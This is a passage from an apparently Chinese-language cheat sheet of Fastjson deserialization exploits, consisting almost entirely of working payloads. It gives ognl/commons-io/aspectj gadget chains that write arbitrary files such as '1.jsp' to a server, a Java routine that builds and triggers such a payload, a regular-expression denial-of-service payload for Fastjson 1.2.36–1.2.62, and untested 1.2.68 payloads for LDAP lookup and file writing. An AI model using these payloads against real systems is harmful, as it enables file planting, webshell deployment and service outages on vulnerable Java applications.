"@type": "org.apache.commons.io.ByteOrderMark", 1612 | "charsetName": "UTF-8", 1613 | "bytes": [ 1614 | 36,82 1615 | ] 1616 | }] 1617 | } 1618 | } 1619 | } 1620 | }, 1621 | "su19": { 1622 | "@type": "ognl.Evaluation", 1623 | "node": { 1624 | "@type": "ognl.ASTMethod", 1625 | "p": { 1626 | "@type": "ognl.OgnlParser", 1627 | "stream": { 1628 | "@type": "org.apache.commons.io.input.BOMInputStream", 1629 | "delegate": { 1630 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1631 | "reader": { 1632 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1633 | "is":{ 1634 | "@type":"org.apache.commons.io.input.TeeInputStream", 1635 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1636 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.is.branch"}, 1637 | "closeBranch": true 1638 | }, 1639 | "httpContentType":"text/xml", 1640 | "lenient":false, 1641 | "defaultEncoding":"UTF-8" 1642 | }, 1643 | "charsetName": "UTF-8", 1644 | "bufferSize": 1024 1645 | }, 1646 | "boms": [{ 1647 | "@type": "org.apache.commons.io.ByteOrderMark", 1648 | "charsetName": "UTF-8", 1649 | "bytes": [ 1650 | 36,82 1651 | ] 1652 | }] 1653 | } 1654 | } 1655 | } 1656 | } 1657 | } 1658 | ``` 1659 | 1660 | ### cc 高版本 2.7 2.8 1661 | ```json 1662 | { 1663 | "su14": { 1664 | "@type": "java.lang.Exception", 1665 | "@type": "ognl.OgnlException" 1666 | }, 1667 | "su15": { 1668 | "@type": "java.lang.Class", 1669 | "val": { 1670 | "@type": "com.alibaba.fastjson.JSONObject", 1671 | { 1672 | "@type": "java.lang.String" 1673 | "@type": "ognl.OgnlException", 1674 | "_evaluation": "" 1675 | } 1676 | }, 1677 | "su16": { 1678 | "@type": "ognl.Evaluation", 1679 | "node": { 1680 | "@type": "ognl.ASTMethod", 1681 | "p": { 1682 | "@type": "ognl.OgnlParser", 1683 | "stream": { 1684 | "@type": "org.apache.commons.io.input.BOMInputStream", 1685 | "delegate": { 1686 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1687 | "reader": { 1688 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1689 | "inputStream":{ 1690 | "@type":"org.apache.commons.io.input.TeeInputStream", 1691 | "input":{ 1692 | "@type":"org.apache.commons.io.input.ReaderInputStream", 1693 | "reader":{ 1694 | "@type":"org.apache.commons.io.input.CharSequenceReader", 1695 | "charSequence":{"@type":"java.lang.String""test8200个a", 1696 | "start":0, 1697 | "end":2147483647 1698 | }, 1699 | "charsetName":"UTF-8", 1700 | "bufferSize":1024 1701 | }, 1702 | "branch":{ 1703 | "@type":"org.apache.commons.io.output.WriterOutputStream", 1704 | "writer":{ 1705 | "@type":"org.apache.commons.io.output.FileWriterWithEncoding", 1706 | "file":"1.jsp", 1707 | "charsetName":"UTF-8", 1708 | "append": false 1709 | }, 1710 | "charsetName":"UTF-8", 1711 | "bufferSize": 1024, 1712 | "writeImmediately": true 1713 | }, 1714 | "closeBranch": true 1715 | }, 1716 | "httpContentType":"text/xml", 1717 | "lenient":false, 1718 | "defaultEncoding":"UTF-8" 1719 | }, 1720 | "charsetName": "UTF-8", 1721 | "bufferSize": 1024 1722 | }, 1723 | "boms": [{ 1724 | "@type": "org.apache.commons.io.ByteOrderMark", 1725 | "charsetName": "UTF-8", 1726 | "bytes": [ 1727 | 36,82 1728 | ] 1729 | }] 1730 | } 1731 | } 1732 | } 1733 | }, 1734 | "su17": { 1735 | "@type": "ognl.Evaluation", 1736 | "node": { 1737 | "@type": "ognl.ASTMethod", 1738 | "p": { 1739 | "@type": "ognl.OgnlParser", 1740 | "stream": { 1741 | "@type": "org.apache.commons.io.input.BOMInputStream", 1742 | "delegate": { 1743 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1744 | "reader": { 1745 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1746 | "inputStream":{ 1747 | "@type":"org.apache.commons.io.input.TeeInputStream", 1748 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1749 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1750 | "closeBranch": true 1751 | }, 1752 | "httpContentType":"text/xml", 1753 | "lenient":false, 1754 | "defaultEncoding":"UTF-8" 1755 | }, 1756 | "charsetName": "UTF-8", 1757 | "bufferSize": 1024 1758 | }, 1759 | "boms": [{ 1760 | "@type": "org.apache.commons.io.ByteOrderMark", 1761 | "charsetName": "UTF-8", 1762 | "bytes": [ 1763 | 36,82 1764 | ] 1765 | }] 1766 | } 1767 | } 1768 | } 1769 | }, 1770 | "su18": { 1771 | "@type": "ognl.Evaluation", 1772 | "node": { 1773 | "@type": "ognl.ASTMethod", 1774 | "p": { 1775 | "@type": "ognl.OgnlParser", 1776 | "stream": { 1777 | "@type": "org.apache.commons.io.input.BOMInputStream", 1778 | "delegate": { 1779 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1780 | "reader": { 1781 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1782 | "inputStream":{ 1783 | "@type":"org.apache.commons.io.input.TeeInputStream", 1784 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1785 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1786 | "closeBranch": true 1787 | }, 1788 | "httpContentType":"text/xml", 1789 | "lenient":false, 1790 | "defaultEncoding":"UTF-8" 1791 | }, 1792 | "charsetName": "UTF-8", 1793 | "bufferSize": 1024 1794 | }, 1795 | "boms": [{ 1796 | "@type": "org.apache.commons.io.ByteOrderMark", 1797 | "charsetName": "UTF-8", 1798 | "bytes": [ 1799 | 36,82 1800 | ] 1801 | }] 1802 | } 1803 | } 1804 | } 1805 | }, 1806 | "su19": { 1807 | "@type": "ognl.Evaluation", 1808 | "node": { 1809 | "@type": "ognl.ASTMethod", 1810 | "p": { 1811 | "@type": "ognl.OgnlParser", 1812 | "stream": { 1813 | "@type": "org.apache.commons.io.input.BOMInputStream", 1814 | "delegate": { 1815 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1816 | "reader": { 1817 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1818 | "inputStream":{ 1819 | "@type":"org.apache.commons.io.input.TeeInputStream", 1820 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1821 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1822 | "closeBranch": true 1823 | }, 1824 | "httpContentType":"text/xml", 1825 | "lenient":false, 1826 | "defaultEncoding":"UTF-8" 1827 | }, 1828 | "charsetName": "UTF-8", 1829 | "bufferSize": 1024 1830 | }, 1831 | "boms": [{ 1832 | "@type": "org.apache.commons.io.ByteOrderMark", 1833 | "charsetName": "UTF-8", 1834 | "bytes": [ 1835 | 36,82 1836 | ] 1837 | }] 1838 | } 1839 | } 1840 | } 1841 | } 1842 | } 1843 | ``` 1844 | 1845 | ## ognl + io + aspectj + commons-codec 写文件 1846 | 需要写入文件大于 8kb 1847 | ```xml 1848 | 1849 | commons-codec 1850 | commons-codec 1851 | 1.6 1852 | 1853 | 1854 | 1855 | commons-io 1856 | commons-io 1857 | 2.2 1858 | 1859 | 1860 | org.aspectj 1861 | aspectjtools 1862 | 1.9.8 1863 | 1864 | 1865 | ognl 1866 | ognl 1867 | 3.2.21 1868 | 1869 | ``` 1870 | 1871 | ```java 1872 | public void ognl_io_aspectj_code_write(){ 1873 | String str = "test"; 1874 | for (int i = 0; i < 8201; i++){ 1875 | str += "a"; 1876 | } 1877 | 1878 | byte[] sb = str.getBytes(); 1879 | String baseStr = Base64.getEncoder().encodeToString(sb); 1880 | byte[] bytes = baseStr.getBytes(); 1881 | 1882 | 1883 | String payload = "\r\n" 1884 | + "{\r\n" 1885 | + " \"su14\": {\r\n" 1886 | + " \"@type\": \"java.lang.Exception\",\r\n" 1887 | + " \"@type\": \"ognl.OgnlException\"\r\n" 1888 | + " },\r\n" 1889 | + " \"su15\": {\r\n" 1890 | + " \"@type\": \"java.lang.Class\",\r\n" 1891 | + " \"val\": {\r\n" 1892 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n" 1893 | + " {\r\n" 1894 | + " \"@type\": \"java.lang.String\"\r\n" 1895 | + " \"@type\": \"ognl.OgnlException\",\r\n" 1896 | + " \"_evaluation\": \"\"\r\n" 1897 | + " }\r\n" 1898 | + " },\r\n" 1899 | + " \"su16\": {\r\n" 1900 | + " \"@type\": \"ognl.Evaluation\",\r\n" 1901 | + " \"node\": {\r\n" 1902 | + " \"@type\": \"ognl.ASTMethod\",\r\n" 1903 | + " \"p\": {\r\n" 1904 | + " \"@type\": \"ognl.OgnlParser\",\r\n" 1905 | + " \"stream\": {\r\n" 1906 | + " \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n" 1907 | + " \"delegate\":{\r\n" 1908 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n" 1909 | + " \"input\":{\r\n" 1910 | + " \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n" 1911 | + " \"in\":{\r\n" 1912 | + " \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n" 1913 | + " \"charset\":\"utf-8\",\r\n" 1914 | + " \"bufferSize\": 1024,\r\n" 1915 | + " \"s\":{\"@type\":\"java.lang.String\"\""+baseStr+"\"\r\n" 1916 | + " },\r\n" 1917 | + " \"doEncode\":false,\r\n" 1918 | + " \"lineLength\":1024,\r\n" 1919 | + " \"lineSeparator\":\"5ZWKCg==\",\r\n" 1920 | + " \"decodingPolicy\":0\r\n" 1921 | + " },\r\n" 1922 | + " \"branch\":{\r\n" 1923 | + " \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n" 1924 | + " \"targetPath\":\"1.jsp\"\r\n" 1925 | + " },\r\n" 1926 | + " \"closeBranch\":true\r\n" 1927 | + " },\r\n" 1928 | + " \"include\":true,\r\n" 1929 | + " \"boms\":[{\r\n" 1930 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n" 1931 | + " \"charsetName\": \"UTF-8\",\r\n" 1932 | + " \"bytes\":"+Arrays.toString(bytes)+"\r\n" 1933 | + " }],\r\n" 1934 | + "}\r\n" 1935 | + " }\r\n" 1936 | + " }\r\n" 1937 | + " },\r\n" 1938 | + " \"su17\": {\r\n" 1939 | + " \"$ref\": \"$.su16.node.p.stream\"\r\n" 1940 | + " },\r\n" 1941 | + " \"su18\": {\r\n" 1942 | + " \"$ref\": \"$.su17.bOM.bytes\"\r\n" 1943 | + " }\r\n" 1944 | + " }"; 1945 | System.out.println(payload); 1946 | JSON.parseObject(payload); 1947 | } 1948 | ``` 1949 | 1950 | 1951 | 1952 | 1953 | 1954 | # 无@type利用 1955 | 对于 Fastjson 1.2.36-1.2.62 的版本存在dos漏洞 1956 | https://b1ue.cn/archives/314.html 1957 | ```json 1958 | {"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 1959 | 1960 | {"regex":{"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 1961 | ``` 1962 | 1963 | 1964 | 1965 | # 待测试 1966 | 1.2.68 1967 | ``` 1968 | 1969 | {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"} 1970 | {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"} 1971 | ``` 1972 | 1973 | 1.2.68的写? 1974 | ``` 1975 | { 1976 | 'stream': 1977 | { 1978 | '@type':"java.lang.AutoCloseable", 1979 | '@type':'java.io.FileOutputStream', 1980 | 'file':'temp', 1981 | 'append':false 1982 | }, 1983 | 'writer': 1984 | { 1985 | '@type':"java.lang.AutoCloseable", 1986 | '@type':'org.apache.solr.common.util.FastOutputStream', 1987 | 'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=', 1988 | 'sink': 1989 | { 1990 | '$ref':'$.stream' 1991 | }, 1992 | 'start':38 1993 | }, 1994 | 'close': 1995 | { 1996 | '@type':"java.lang.AutoCloseable", 1997 | '@type':'org.iq80.snappy.SnappyOutputStream', 1998 | 'out': 1999 | { 2000 | '$ref':'$.writer' 2001 | } 2002 | } 2003 | } 2004 | ``` 2005 | 2006 | --------------------------------------------------------------------------------